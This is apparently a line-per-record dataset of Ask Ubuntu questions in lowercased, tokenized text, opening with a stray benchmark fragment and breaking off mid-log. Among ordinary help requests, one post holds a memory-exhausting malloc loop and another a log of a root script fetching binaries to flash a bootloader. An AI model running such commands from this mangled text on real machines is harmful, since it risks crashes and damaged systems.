controller nvidia corporation nv11 [ geforce2 mx/mx 400 ] ( rev a1 ) ( prog-if 00 [ vga controller ] ) this machine 1302 mhz 89.851 intel ( r ) celeron ( r ) m processor 1.50ghz ( null ) 40.8816714 powerpc 740/750 ( 280.00mhz ) ( null ) 161.312647
397628	compile multiarch packages for some mingw architecture	i want to install some generally used cross compilation libraries ( iconv , boost , âś ) on my ubuntu system using multiarch . i remember that i saw a tutorial for that but i can not find it at the moment using a search engine . the tutorials i found so far are using the manual installation routines . my experiences with macports show that its is not generally advisable for libraries that are used in different projects . so i 'd like to have a cross compilation environment that is fully integrated with an ubuntu installation . so far i know that i need to add an architecture to ostable and triplettable in /usr/share/dpkg . downloading the source packages is no problem but i do n't understand what is the best way to build such a package . i tried xapt and xdeb , but somehow they do n't seem to recognize the right architecture . any hints/links to tutorials how i can build a boost.xxx.mingw32_i686.deb or similar package would be helpful .
397629	uninstall gnome desktop from ubuntu server 12.04lts	i installed gnome desktop in my bare-metal ubuntu server 12.04 lts . now i need to remove it ... .. & as usual i am stuck so ... .. 'help ' ?
397631	acpi-support script missing in rc.d	i 've just had a look inside the directories /etc/init.d and /etc/rc.d . i have a 13.10 machine , upgraded from 13.04 . then i saw that this link was missing . s99acpi-support - > ../init.d/acpi-support what is this script suppposed to do ? maybe it was migrated to another location ? i have other files with similar names on this machine . none of them seems to be a shell script . should i get it from elsewhere , e.g . from the default repos ? alternatively , should i just remove the invalid links ? locate /acpi-support /etc/default/acpi-support /usr/share/acpi-support /usr/share/acpi-support/state-funcs /usr/share/doc/acpi-support /usr/share/doc/acpi-support/readme /usr/share/doc/acpi-support/changelog.gz /usr/share/doc/acpi-support/copyright /var/lib/acpi-support /var/lib/dpkg/info/acpi-support.conffiles /var/lib/dpkg/info/acpi-support.list /var/lib/dpkg/info/acpi-support.md5sums /var/lib/dpkg/info/acpi-support.postinst /var/lib/dpkg/info/acpi-support.preinst
397632	install custom version of node with apt-get	i 've installed nodejs this way : sudo apt-get install python-software-properties python g++ make sudo add-apt-repository ppa : chris-lea/node.js sudo apt-get update sudo apt-get install nodejs the thing is it installs node v 0.10.24 . is there there a way i can install nodejs 0.10.23 only just temporarily so i can do an easy apt-get update later so it can be once again the latest version ? is it possible to do with with apt-get and not use other tools ( like nvm or building from source ) ?
397633	bluetooth issue ubuntu 12.04 , lenovo z580	i 'm a new ubuntu user . after 5 months witch ubuntu i cant imagine to turn back to windows . however i have just one issue with this system : my bluetooth is not working . my computer is a lenovo z580 , pentium i3 , 4gb ram . system : ubuntu 12.04 ( 64bit ) the bluetooth was working under windows 7 . i have only ubuntu installed at the moment . i can turn the bt on/off from the top menu , but still no luck . here is what i have already tried : checking if the bt is enabled in bios - it is checking the hardware switch : the hardware switch in z580 is under fn+f5 , however in windows it worked for both : bluetooth and wifi . after pressing it a special window showed up where it was possible to turn wifi and bt on/off . in ubuntu it works just for wifi . i tried to press it more times to find out if it will turn on - no success . kernel was updated to 3.8.0-34 generic in hope that the newer one will help out . i also tried this on ubuntu 13.10 and 14.04 live cd , where the bt is still not working ... rfkill list returns : 0 : ideapad_wlan : wireless lan soft blocked : no hard blocked : no 1 : ideapad_bluetooth : bluetooth soft blocked : no hard blocked : no 2 : phy0 : wireless lan soft blocked : no hard blocked : no
397636	all changes made in ubuntu 12.04 reset on restart	every time i restart ubuntu , every single change i made is reversed and the operating system is brand new again like nothing ever happened . how do i make my changes remain ?
397637	how to make cover page using libre office ?	i 'm trying to make a cover page using libreoffice . but where is the cover option ? i ca n't find it out .
397638	ubuntu server 12.04 on a ssd & data on raid hdd	i 'm new so please forgive me if i 'm posting against the rules or something like that . i found some topics that are a bit related , but none with raid 10 . i 'm going to switch from windows server to ubuntu 12.04 ( finally ! ! ! ) , but now i have a question : i have a 128 gb ssd , that i want to use for the main os , and i have four 1tb drives , that i want in a raid 10 configuration for all my data . i already tried to install , but after the installation , i rebooted and then i get the raid configuration screen ( that said that there are n't any raid drives ) , and then nothing but a black screen with a flickering cursor a the top left ( as far as i know that means the is n't any os detected ) . so i booted in to recovery from the usb and from the [ partition disk ] menu , i see that my partition on the ssd is set to { not used } , but i 'm sure i set it correctly before . the same is applying for the raid volume . what is the best thing i can do now ? edit : @ psusi , htnx for your replay . in the intel raid configuration manager , i added all the drives to a raid 10 ( 0+1 ) configuration , after that i started the installation and ubuntu auto detected the raid and added it to my partitioning list . then u just mounted the raid partition to /home and made 2 new partitions on my ssd ( boot and swap ) and mounted the boot part . on / here is the output : ~ # dmraid -s **** group superset isw_hjabdiead -- > superset name : isw_hjabdiead_data size : 3711742464 stride : 128 type : raid01 status : ok subset : 2 devs : 4 spares : 0 ps : sorry ca n't get that code block working correctly : p
397641	terminal shows `` could n't open audio : could n't open audio device or esd connection '' after launching a game and there is no sound in the game	so i tried installing a heroes of might and magic 3 linux loki game version into ubuntu 13.10 and everything is fine but i do n't have sound . when i try to launch a game through a terminal it throws an error : could n't open audio : could n't open audio device or esd connection and when the game launches , there is no sound . what could be the problem ?
397642	modify this one single thing in unity	i 'd like to change the shortcuts on the left when you navigate through nautilus , especially the `` places '' part . i 'd like to personalize my home , you know : ( i'v looked with dconf editor and compiz config but i ca n't find it ! someone know how to do it ?
397644	recover data from autoclean	i have used sudo apt-get autoclean command and sudo apt-get clean command but did n't knew that i 'll loose all my data . is there any way to recover that data ?
397645	unity screen , slow opening	recently i installed ubuntu 13.10 on my lenovo z370 ( i3-2120 , 4gb ram ) and i feel that when use super ( windows ) key , or click to open the unity dash , it is slow , like it 's low fps to open the panel . i thought my hardware is capable to run ubuntu smoothly , what do you think that can be the problem ? it happens since i installed . thanks in advance .
397646	ubuntu 13.10 wo n't wake up after suspend	i have some difficulties with ubuntu 13.10 ( 3.11.0-14-generic ) and waking up from suspend state . screen just goes blank , and there is some kind of prompt blink in upper right corner after i just need to restart my computer . specs : de : gnome intelâž coreâ˘ i7-3770 cpu @ 3.40ghz geforce gtx 650/pcie/sse2 with : nvidia binary xorg driver , nvidia-331 ( open source ) 16 gb of ram ( / folder on ssd drive , /home on hdd ) p.s . nvidia graphic driver works perfectly without any glitches . thanks for any help you can provide..
397648	updating broadcom wifi driver 12.04	as many others i ran into a problem with my broadcom wifi driver on 12.04 . following the instructions at the broadcom website compile broadcom wifi driver , i successfully made it work ... well , almost . the last bit of the instructions tells me that to permanently replace the old driver ( i.e . load new driver at boot time ) , i should do the following : $ > cp wl.ko /lib/modules/`uname -r`/kernel/drivers/net/wireless $ > depmod -a this bit does n't seem to work , and i have to manually insmod the driver each time i reboot my laptop . any ideas what could be the reason for this ?
397650	by installing ubuntu 13.04 on vmware workstation 9 is running very slow on host os win7	i have core 2 duo pc , 2.1 ghz and with 4gb ram . i have host os win7 . i have nstalled workstation 9 on it , and then ubuntu 13.04 on to workstation 9 . the working of ubuntu 13.04 is very low . how can i enjoy good ubuntu working with efficient speed ? thanks advance .
397651	fish shell : `` shopt -s dotglob '' analog	i 'm trying to migrate from bash to fish . what is the fish 's analog to shopt ? i 'm trying to imitate this line from my .bashrc : shopt -s dotglob # for mv * see hidden files
397652	no mouse pointer in unity after removing gnome 3	i tried to install gnome 3 on ubuntu 13.10 but did not like the change so i reverted by using the terminal . i pressed `` yes '' whenever asked during the process . after rebooting there were no menu bars or side panels only the background image . i then reinstalled unity and rebooted , but this time no mouse pointer . can anyone please help ? i have tried to reset unity , and installing the tweak tool but all to no avail . not sure if this is a hint , but when i tried to reinstall gnome i got an error saying packages not complete .
397657	how to see hibernate in the power setting correctly ?	i enabled hibernate and it works . also i can see hibernate option in the system menu and in the power setting as an option of `` when power is critically low '' . however i can not see hibernate in the power setting as an option of `` when the lid is closed '' which has only `` suspend '' and `` do nothing '' options . can i add hibernate as an option for `` when lid is closed '' setting ?
397659	wlan issue on 13.10	i am using an 'hama wireless lan usb stick ' . my connection disconnects regularly , sometimes its possible to reconnect , but mostly its not helping ... my /var/log/syslog contains the following lines : < warn > /sys/devices/virtual/net/lo : could n't determine device driver ; ignoring ... < warn > /sys/devices/virtual/net/lo : could n't determine device driver ; ignoring ... ifconfig output : wlan0 link encap : ethernet hardware adresse 80:1f:02:05 : fd : d7 inet adresse:192.168.2.33 bcast:192.168.2.255 maske:255.255.255.0 inet6-adresse : fe80 : :821f:2ff : fe05 : fdd7/64 gültigkeitsbereich : verbindung up broadcast running multicast mtu:1500 metrik:1 rx-pakete:230 fehler:0 verloren:0 überläufe:0 fenster:0 tx-pakete:266 fehler:0 verloren:0 überläufe:0 träger:0 kollisionen:0 sendewarteschlangenlänge:1000 rx-bytes:116654 ( 116.6 kb ) tx-bytes:54715 ( 54.7 kb ) i 'm not shure if this is a ubuntu issue , because rebooting the router helps ( sometimes ) . is there any solution ? thanks in the preface
397660	smart scope weather in celsius ?	when i type `` weather : city name '' in ubuntu 13.10 's smart scope , i am shown the weather for my area ... but it 's in fahrenheit ! any way to change this to celsius ?
397664	installing drivers from nvidia website for gtx 760 ?	i recently bought a gtx 760 , but upon using the drivers from the additional drivers menu does n't gain any fps increase over my old gt530 card . i decided to go to the nvidia website and i downloaded the latest version of the driver : nvidia-linux-x86_64-331.20.run is the file i got . but when i open the terminal and sh the file it tells me that i still have an x server running , and that i ca n't install the driver . is there any way i can stop x server or load up ubuntu without x server loading too ? thanks in advance .
397666	webcam does n't work anymore after using video4linux control panel	my webcam worked , but the video inside skype was upside down . i found out that video4linux control panel is able to turn it . i used the program to turn the video , but now the video freezes after a few seconds or it does n't even start ( tested with cheese ) . i removed the program , but it did n't help . does someone know a solution ? i 'm using 12.04 ubuntu
397670	my ubuntu ca n't kill the process which occupy too much memory ?	when i tested it , my computer tried it best to provide the most memory to my program.. and my computer crashed.. but i remembered that ubuntu will kill this process if it needs too much memory continually.. why it becomes this ? /*i write the code to test how much memory can my computer provide the most*/ # include < stdio.h > # include < stdlib.h > int main ( ) { int m = 0 ; while ( malloc ( 1 < < 20 ) ) { printf ( `` % d mb\n '' , ++m ) ; } return 0 ; }
397671	ubuntu-sdk can not start qtcreator	i can not start qtcreator with ubuntu-sdk installed . i 'm getting error : void dbusmenuexporterprivate : :addaction ( qaction* , int ) : already tracking action `` follow symbol under cursor '' under id 142 loaded the dummy plugin loaded the linux plugin registered the aalsensorplugin types segmentation fault ( core dumped ) when i removed qtcreator-plugin-ubuntu i was able to start qtcreator . there has to be bug in ubuntu-sdk plugins . i 'm running ubuntu 13.10 64 bit . how to fix it ?
397673	how to take sreenshots on nexus 4 running ubuntu touch ?	i 've just flashed ubuntu touch & android dual-boot onto my nexus 4 . it 's awesome with a mobile device running two oses at the same time . i want to know that how can i take screenshots on ubuntu touch running on nexus 4 ?
397674	run scripts automatically in server after ssh connection	how to run a script automatically in server soon after client system establish ssh connection with the server for ex : suppose a user will logon to my computer from another system ( connected via lan ) using ssh connection . at that time , a script ( python or shell ) should be run automatically in my system to perform some validation ? how to run the script automatically in server system ?
397676	openstack havana shows only one computer	i have 3 computers with wich i want to build a cloud . on the first i have installed maas , after that i have added the other two as nodes in the maas . i have installed juju bootstrap on the second computer and deployed openstack/keystone , quantum , nova-compute etc . and the openstack-dashboard/ on the third . when i login openstack-dashboard and go to hypervisors i see the components /cpu , ram , hdd/ only of the third computer /the one with the openstack/ what should i do to see the resources of all computers and build virtual machines with all of them . thanks and happy new year !
397677	synaptics drivers are not loading on kubuntu 13.10 on dell vostro 2420	i freshly installed kubuntu 13.10 , 32 bit version on newly purchased dell vostro 2420. everything is working fine except scrolling and multitouch features through touchpad . i am able to change position of cursor using touchpad and able to tap ( single click and double click ) but scrolling is not working i tried to find out solution by searching on google but could not find proper solution to load synaptics drivers . i am listing some details : laptop : dell vostro 2420 linux kernel version and distribution : 3.11.0-12-generic , kubuntu 13.10 output of xinput list is ⎡ virtual core pointer id=2 [ master pointer ( 3 ) ] ⎜ ↳ virtual core xtest pointer id=4 [ slave pointer ( 2 ) ] ⎜ ↳ ps/2 generic mouse id=12 [ slave pointer ( 2 ) ] ⎣ virtual core keyboard id=3 [ master keyboard ( 2 ) ] ↳ virtual core xtest keyboard id=5 [ slave keyboard ( 3 ) ] ↳ power button id=6 [ slave keyboard ( 3 ) ] ↳ video bus id=7 [ slave keyboard ( 3 ) ] ↳ power button id=8 [ slave keyboard ( 3 ) ] ↳ sleep button id=9 [ slave keyboard ( 3 ) ] ↳ laptop_integrated_webcam_hd id=10 [ slave keyboard ( 3 ) ] ↳ at translated set 2 keyboard id=11 [ slave keyboard ( 3 ) ] ↳ dell wmi hotkeys id=13 [ slave keyboard ( 3 ) ] output of synclient -l is could n't find synaptics properties . no synaptics driver loaded ? output of lshw is at http : //paste.ubuntu.com/6645687/ xserver log and dmesg dont have trace of synaptics kindly tell me how to troubleshoot this problem .
397678	internet loses connectivity when steam is launched	i 'm running ubuntu 12.04 whenever i launch steam or start a steam download i lose internet connectivity . specifically i can no longer ping my default gateway . if i reconnect to the wireless it will restart the connection and work fine after that until i start a steam download , whenever there is a steam download it will randomly drop the connection . it never says that i 've been disconnected from the wireless network i can just no longer ping the default gateway . thanks for reading and i 'm happy to provide any additional information .
397679	proxy setting and updating after that	i have correctly set up the proxy in my terminal and it 's not showing any trouble but after that i try to update the system by the command `` apt-get update '' and it 's showing 0 % [ connecting to in.archive.ubuntu.com ( 91.189.92.201 ) ] [ connecting to security ] . thank you in advance . ps : for the proxy setting i followed the command in the root gksudo gedit /etc/apt/apt.conf and then did the export http_proxy ... etc stuffs
397680	on a mac with 12.04 , how does one iock icons to the launcher ?	my wife has an airbook . how does one lock an icon to the launcher on a mac ? with a normal pc , it is easy , right click and `` lock icon to launcher '' . with mac , there is no right click , and the option and command buttons do not offer anything that is useful . i am at ncsailor62 ( at the google mail site ) gmail
397684	seeking database , like access , with picture fields	i want to move my access database into ubuntu 12.04 . the database catalogs items my ancestors owned , and who owns them now . i 'd like to put one or more pictures of each item in the database , to appear on forms and reports . is there any software which will do this ?
397685	ubuntu 12.04 not displaying windows 8 in grub menu	i 'm new to dual boot installation of ubuntu and windows 8 . i had first installed windows 8 and then install ubuntu 12.04 and after completion reboot my pc . i have configured dual boot with easybcd for displaying dual boot os options in grub and it also displayed it but when i choose windows 8 it shows error that `` bootmgr is missing press ctrl+alt+delete to restart '' . after that i used `` boot-repair '' tool but bad luck after using it , windows 8 option gone in grub ( not displaying ) that displayed before use of `` boot-repair '' tool . /////////////////////////////////////////////////////////////////// output of : fdisk -l disk /dev/sda : 1000.2 gb , 1000204886016 bytes 255 heads , 63 sectors/track , 121601 cylinders , total 1953525168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00044284 device boot start end blocks id system /dev/sda1 * 2048 327682047 163840000 7 hpfs/ntfs/exfat /dev/sda2 327682048 1953523711 812920832 83 linux disk /dev/sdb : 160.0 gb , 160041885696 bytes 255 heads , 63 sectors/track , 19457 cylinders , total 312581808 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x0009d14e device boot start end blocks id system //////////////////////////////////////////////////////////// pls guys provide some solution .
397687	install ubuntu on macbook pro 11,2 with retina display	how can i install ubuntu on macbook pro 11,2 ( late 2013 ) with retina display . have searched on other forums but did not get answers . preferred would be ubuntu 12.04 lts .
397690	hdmi out does n't give sound 13.10	i 've installed ubuntu on hp-pavilion . it has a ati video card . i used to run windows7 on it just as a media centre . i want to do the same just with ubuntu . i 've found multiple topics with similar problems but none of the answers seem to help me . the output is listed with aplay -l and in the configuration screen . but when switching it remains quite . anyone ?
397691	install ubuntu on hp pavilion dv6-3170se entertainment notebook pc	i would like to ask if i can install ubuntu on my laptop hp pavilion dv6-3170se entertainment notebook pc . link to my product specifications : click here for specifications
397692	ubuntu installed using wubi is not working	i have 04 in my win7 64bit pc using wubi installer . i downloaded wubi and followed the instructions . it worked for a few days and now ubuntu is not booting , it shows a black screen . i uninstalled ubuntu from the windows control panel and re-installed but it 's not working .
397703	gui does n't work , but server does	system : amd phenom ii quad core 4gb ram ati 5750 gpu ( i think ) 3x3tb hd in raid 5 config ( installed these using raider ) initially installed mythbuntu , everything worked fine . upgraded to standard ubuntu-desktop , everything worked fine then my wife screwed with some stuff and after that the desktop would boot and then instantly freeze . however , myth backend still works great . i booted from the liveusb to make sure gpu was n't bad , works fine . upgraded ui to ubuntu unity . no change . right now , i 'm regretting putting the os and the storage on the same disks . i bought a new hd so i can put the os on a separate drive . i do n't care about the os so much , but i do n't want to lose all my videos . any help would be much appreciated . here is my fdisk -l output : disk /dev/sda : 3000.6 gb , 3000592982016 bytes 255 heads , 63 sectors/track , 364801 cylinders , total 5860533168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x00000000 device boot start end blocks id system /dev/sda1 1 4294967295 2147483647+ ee gpt partition 1 does not start on physical sector boundary . warning : gpt ( guid partition table ) detected on '/dev/sdb ' ! the util fdisk does n't support gpt . use gnu parted . disk /dev/sdb : 3000.6 gb , 3000592982016 bytes 255 heads , 63 sectors/track , 364801 cylinders , total 5860533168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x00000000 device boot start end blocks id system /dev/sdb1 1 4294967295 2147483647+ ee gpt partition 1 does not start on physical sector boundary . warning : gpt ( guid partition table ) detected on '/dev/sdc ' ! the util fdisk does n't support gpt . use gnu parted . disk /dev/sdc : 3000.6 gb , 3000592982016 bytes 255 heads , 63 sectors/track , 364801 cylinders , total 5860533168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x00000000 device boot start end blocks id system /dev/sdc1 1 4294967295 2147483647+ ee gpt partition 1 does not start on physical sector boundary . disk /dev/md0 : 5992.3 gb , 5992323481600 bytes 2 heads , 4 sectors/track , 1462969600 cylinders , total 11703756800 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 524288 bytes / 1048576 bytes disk identifier : 0x00000000 disk /dev/md0 does n't contain a valid partition table
397704	how to get a cd/dvd to run manually	occasionally when i insert a disk in the optical drive , cd or dvd it does not start to run automatically . is there a terminal command that will start the disk running . i am running ubuntu 13.10 .
397705	no sound on powerpc , soundcard not detected	i am running lubuntu 13.10 on , among other machines , a mac ibook g4 . i hear the signature sound on turning the machine on , but there is no sound when playing audio or video . robert @ lubuntu-ibookg4 : ~ $ aplay -l aplay : device_list:268 : no soundcards found ... i have read the advice here , and everything appears in order : https : //wiki.ubuntu.com/powerpcfaq # why_do_i_have_no_sound.3f my sound does not appear to be muted* . modules : snd-powermac is loaded . the following are blacklisted : snd-aoa , snd-aoa-fabric-layout , snd-aoa-soundbus , snd-aoa-i2sbus , snd-aoa-codec-tas . ( * the above link gives the advice : `` you need to check more than just your master volume , for example the volume of the pcm channel maybe set to zero '' . however , i do not know how to check the `` pcm channel '' . i have installed gnome-alsamixer , but it does not appear to open properly i.e . the gui opens but without any controls , just a blank window ) . any help gratefully received . many thanks .
397706	do i need gnome on my pc with 12.04lts to install gtk themes ?	i was just asking if i need gnome installed on my pc for me to install gtk themes ... ... on ubuntu 12.04lts .
397708	postgresql graphical interface alternatives	hi i am looking for some suggestions on what graphical interface we can use in postgresql aside from pgadmin3 . any recommendations ?
397711	lxde : theme that works for both gtk2 and gtk3 ?	i installed lxde , but it seems the default theme ( clearlooks ) does n't work for transmission , which is a gtk3 app . all the themes i see in the appearance tool are either gtk2 , or gtk3 , but not both . what should i do to make both gtk2 and gtk3 apps look good in lxde ?
397712	why is the second linux system i install unable to access the internet ?	i am attempting to run zorin os 7 alongside ubuntu on my laptop , but whichever os i install second , does not have internet access ( will not work with ethernet or wifi ) . so i was wondering if this was an issue because both os are ubuntu based or am i doing something wrong ?
397714	missing features in gnome after installing	i installed gnome by following the instructions listed in : how do i install and use the latest version of gnome ? installation went through with no problem but i couldnot get the complete experience of gnome . i will show it through the following image : this shows that i am still stuck up in a file manager similar to unity , and features like minimise are missing . i wish to know how to get gnome into proper shape . will i be able to install apps like gnome maps , musics , ect ...
397717	alfa awus036nh driver	hello everyone i have a question about alfa awus036nh network adapter , i tried this link : how do i install drivers for the alfa awus036h usb wireless adapter ? but when i do : make i get these errors : make [ 2 ] : *** [ /home/mohammad/downloads/rtl8187l_linux_1041.0209.2012/rtl8187/r8187_core.o ] error 1 make [ 1 ] : *** [ _module_/home/mohammad/downloads/rtl8187l_linux_1041.0209.2012/rtl8187 ] error 2 make [ 1 ] : leaving directory `/usr/src/linux-headers-3.8.0-34-generic' make : *** [ all ] error 2 what do i have to change to compile the driver ?
397718	ubuntu on a windows 8.1 tablet	i would like to ask if i could run the normal pc ubuntu version on one of the new windows 8.1 tablets with the intel atom z3770 or z3740 ? it is possible ? would be nice , because the hardware and the price sounds great but windows 8 is n't it for me because i 'm a open-source and diy guy . or are they cheapie convertible ? i searched the web but did n't found a list with products working with ubuntu .
397720	accidentally wrote a uboot script onto ubuntu root	i 'm trying to install archlinux on a pogoplug ... . but i got an error saying permission was denied because i was not root ... so i know to associate `` sudo '' with root , but i did n't think until afterwards that sudo might only be used as the root command for the ubuntu os ... i checked the directory folder on the ubuntu drive , and sure enough i had written the script to it ... this is the command i entered /tmp $ sudo ./install_uboot_mtd0.sh this is what it spit out ... ... ... . ! ! ! ! ! ! danger danger danger danger danger danger ! ! ! ! ! ! if you lose power to your device while running this script , it could be left in an unusable state . this script will replace the bootloader on /dev/mtd0 . this installer will only work on the following devices : seagate dockstar seagate goflex net seagate goflex home pogoplug v1 pogoplug pink ( v2 ) do not run this installer on any other device . by typing ok , you agree to assume all liabilities and risks associated with running this installer . if you agree , type 'ok ' and press enter to continue : ok # checking for /usr/sbin/nandwrite ... # installing /usr/sbin/nandwrite ... -- 2013-12-30 09:12:24 -- http : /download.doozan.com/uboot/nandwrite.md5 resolving download.doozan.com ( download.doozan.com ) ... 50.116.34.13 connecting to download.doozan.com ( download.doozan.com ) |50.116.34.13|:80 ... connected . http request sent , awaiting response ... 200 ok length : unspecified [ text/html ] saving to : `/usr/sbin/nandwrite.md5' [ < = > ] 32 -- .-k/s in 0s 2013-12-30 09:12:24 ( 3.18 mb/s ) - `/usr/sbin/nandwrite.md5 ' saved [ 32 ] -- 2013-12-30 09:12:24 -- http : /download.doozan.com/uboot/nandwrite resolving download.doozan.com ( download.doozan.com ) ... 50.116.34.13 connecting to download.doozan.com ( download.doozan.com ) |50.116.34.13|:80 ... connected . http request sent , awaiting response ... 200 ok length : 11500 ( 11k ) [ ] saving to : `/usr/sbin/nandwrite' 100 % [ ====================================== > ] 11,500 -- .-k/s in 0.03s 2013-12-30 09:12:25 ( 359 kb/s ) - `/usr/sbin/nandwrite ' saved [ 11500/11500 ] # successfully installed /usr/sbin/nandwrite . # checking for /usr/sbin/nanddump ... # installing /usr/sbin/nanddump ... -- 2013-12-30 09:12:25 -- http : /download.doozan.com/uboot/nanddump.md5 resolving download.doozan.com ( download.doozan.com ) ... 50.116.34.13 connecting to download.doozan.com ( download.doozan.com ) |50.116.34.13|:80 ... connected . http request sent , awaiting response ... 200 ok length : unspecified [ text/html ] saving to : `/usr/sbin/nanddump.md5' [ < = > ] 32 -- .-k/s in 0s 2013-12-30 09:12:26 ( 2.60 mb/s ) - `/usr/sbin/nanddump.md5 ' saved [ 32 ] -- 2013-12-30 09:12:26 -- http : /download.doozan.com/uboot/nanddump resolving download.doozan.com ( download.doozan.com ) ... 50.116.34.13 connecting to download.doozan.com ( download.doozan.com ) |50.116.34.13|:80 ... connected . http request sent , awaiting response ... 200 ok length : 21286 ( 21k ) [ ] saving to : `/usr/sbin/nanddump' 100 % [ ====================================== > ] 21,286 -- .-k/s in 0.07s 2013-12-30 09:12:26 ( 303 kb/s ) - `/usr/sbin/nanddump ' saved [ 21286/21286 ] # successfully installed /usr/sbin/nanddump . # checking for /usr/sbin/flash_erase ... # installing /usr/sbin/flash_erase ... -- 2013-12-30 09:12:26 -- http : /download.doozan.com/uboot/flash_erase.md5 resolving download.doozan.com ( download.doozan.com ) ... 50.116.34.13 connecting to download.doozan.com ( download.doozan.com ) |50.116.34.13|:80 ... connected . http request sent , awaiting response ... 200 ok length : unspecified [ text/html ] saving to : `/usr/sbin/flash_erase.md5' [ < = > ] 32 -- .-k/s in 0s 2013-12-30 09:12:27 ( 3.33 mb/s ) - `/usr/sbin/flash_erase.md5 ' saved [ 32 ] -- 2013-12-30 09:12:27 -- http : /download.doozan.com/uboot/flash_erase resolving download.doozan.com ( download.doozan.com ) ... 50.116.34.13 connecting to download.doozan.com ( download.doozan.com ) |50.116.34.13|:80 ... connected . http request sent , awaiting response ... 200 ok length : 12819 ( 13k ) [ ] saving to : `/usr/sbin/flash_erase' 100 % [ ====================================== > ] 12,819 -- .-k/s in 0.06s 2013-12-30 09:12:27 ( 210 kb/s ) - `/usr/sbin/flash_erase ' saved [ 12819/12819 ] # successfully installed /usr/sbin/flash_erase . # checking for /usr/sbin/fw_printenv ... # installing /usr/sbin/fw_printenv ... -- 2013-12-30 09:12:27 -- http : //download.doozan.com/uboot/fw_printenv.md5 resolving download.doozan.com ( download.doozan.com ) ... 50.116.34.13 connecting to download.doozan.com ( download.doozan.com ) |50.116.34.13|:80 ... connected . http request sent , awaiting response ... 200 ok length : unspecified [ text/html ] saving to : `/usr/sbin/fw_printenv.md5' [ < = > ] 32 -- .-k/s in 0s 2013-12-30 09:12:28 ( 3.33 mb/s ) - `/usr/sbin/fw_printenv.md5 ' saved [ 32 ] -- 2013-12-30 09:12:28 -- http : /download.doozan.com/uboot/fw_printenv resolving download.doozan.com ( download.doozan.com ) ... 50.116.34.13 connecting to download.doozan.com ( download.doozan.com ) |50.116.34.13|:80 ... connected . http request sent , awaiting response ... 200 ok length : 668497 ( 653k ) [ ] saving to : `/usr/sbin/fw_printenv' 100 % [ ====================================== > ] 668,497 1.46m/s in 0.4s 2013-12-30 09:12:28 ( 1.46 mb/s ) - `/usr/sbin/fw_printenv ' saved [ 668497/668497 ] # successfully installed /usr/sbin/fw_printenv . # checking for /etc/fw_env.config ... # installing /etc/fw_env.config ... -- 2013-12-30 09:12:28 -- http : /download.doozan.com/uboot/fw_env.config.md5 resolving download.doozan.com ( download.doozan.com ) ... 50.116.34.13 connecting to download.doozan.com ( download.doozan.com ) |50.116.34.13|:80 ... connected . http request sent , awaiting response ... 200 ok length : 32 [ text/html ] saving to : `/etc/fw_env.config.md5' 100 % [ ====================================== > ] 32 -- .-k/s in 0s 2013-12-30 09:12:29 ( 5.19 mb/s ) - `/etc/fw_env.config.md5 ' saved [ 32/32 ] -- 2013-12-30 09:12:29 -- http : /download.doozan.com/uboot/fw_env.config resolving download.doozan.com ( download.doozan.com ) ... 50.116.34.13 connecting to download.doozan.com ( download.doozan.com ) |50.116.34.13|:80 ... connected . http request sent , awaiting response ... 200 ok length : 329 [ ] saving to : `/etc/fw_env.config' 100 % [ ====================================== > ] 329 -- .-k/s in 0s 2013-12-30 09:12:30 ( 45.2 mb/s ) - `/etc/fw_env.config ' saved [ 329/329 ] # successfully installed /etc/fw_env.config . # validating existing uboot ... /usr/sbin/nanddump : 1 : /usr/sbin/nanddump : syntax error : word unexpected ( expecting `` ) '' ) -- 2013-12-30 09:12:30 -- http : /jeff.doozan.com/uboot/valid-uboot.md5 resolving jeff.doozan.com ( jeff.doozan.com ) ... 50.116.34.13 connecting to jeff.doozan.com ( jeff.doozan.com ) |50.116.34.13|:80 ... connected . http request sent , awaiting response ... 301 moved permanently location : http : //projects.doozan.com/uboot/valid-uboot.md5 [ following ] -- 2013-12-30 09:12:30 -- http : /projects.doozan.com/uboot/valid-uboot.md5 resolving projects.doozan.com ( projects.doozan.com ) ... 50.116.34.13 connecting to projects.doozan.com ( projects.doozan.com ) |50.116.34.13|:80 ... connected . http request sent , awaiting response ... 200 ok length : 1133 ( 1.1k ) [ text/plain ] saving to : `/tmp/valid-uboot.md5' 100 % [ ====================================== > ] 1,133 -- .-k/s in 0s 2013-12-30 09:12:31 ( 143 mb/s ) - `/tmp/valid-uboot.md5 ' saved [ 1133/1133 ] md5sum : /tmp/uboot-mtd0-dump : no such file or directory did i do irrepairable damage to my os ? i hope not ! it still seems fine for now , but should i fear a reboot ? i scared ...
397724	quickly error `` canâ´t create or update ubuntu package ''	try to build a gmail view app for my owm but by creating a package i get this error . how to fix jeffrey @ chuhundra : ~/gmail $ quickly package ... ... ... ... ... ... ... . command returned some warnings : -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- ( setup.py:13590 ) : gtk-warning ** : theme parsing error : gtk-widgets.css:760:1 : expected semicolon ( setup.py:13590 ) : gtk-warning ** : theme parsing error : gtk-widgets.css:780:0 : expected a valid selector gmail/gmailwindow.py~ ( setup.py:13590 ) : gtk-warning ** : theme parsing error : gtk-widgets.css:873:22 : not using units is deprecated . assuming 'px ' . gmail/__init__.py~ ( setup.py:13590 ) : gtk-warning ** : theme parsing error : button.css:155:14 : not using units is deprecated . assuming 'px ' . ( setup.py:13590 ) : gtk-warning ** : theme parsing error : button.css:155:14 : junk at end of value ( setup.py:13590 ) : gtk-warning ** : theme parsing error : toolbar.css:110:13 : not using units is deprecated . assuming 'px ' . ( setup.py:13590 ) : gtk-warning ** : theme parsing error : toolbar.css:110:13 : junk at end of value ( python-mkdebian:13589 ) : gtk-warning ** : theme parsing error : 